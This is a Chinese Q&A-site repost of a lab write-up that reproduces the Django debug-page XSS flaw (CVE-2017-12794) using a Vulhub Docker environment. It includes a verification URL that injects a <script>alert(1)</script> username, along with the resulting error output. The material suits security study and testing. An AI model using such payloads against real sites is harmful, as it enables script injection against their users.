已解决
【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)
来自网友在路上 173873提问 提问时间:2023-11-05 14:59:20阅读次数: 73
最佳答案 问答题库738位专家为你答疑解惑
感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规
文章目录
- 1.1、漏洞描述
- 1.2、漏洞等级
- 1.3、影响版本
- 1.4、漏洞复现
- 1、基础环境
- 2、漏洞分析
- 3、漏洞验证
1.1、漏洞描述
1.11.5版本,修复了500页面中存在的一个XSS漏洞
1.2、漏洞等级
1.3、影响版本
Django 1.11.5版本
1.4、漏洞复现
1、基础环境
Path:Vulhub/django/CVE-2017-12794
启动测试环境:
sudo docker-compose up -d
访问http://your-ip:8000/即可看到
2、漏洞分析
vulhub
3、漏洞验证
http://192.168.8.8:8000/create_user/?username=%3Cscript%3Ealert(1)%3C/script%3E
用户已经被 创建
再次刷新页面触发XSS
抛出异常
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(1)</script>) already exists.
查看全文
99%的人还看了
相似问题
猜你感兴趣
版权申明
本文"【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)":http://eshow365.cn/6-32779-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!
- 上一篇: 高中信息技术学业水平考试模拟题库
- 下一篇: 2023.11.4 Idea 配置国内 Maven 源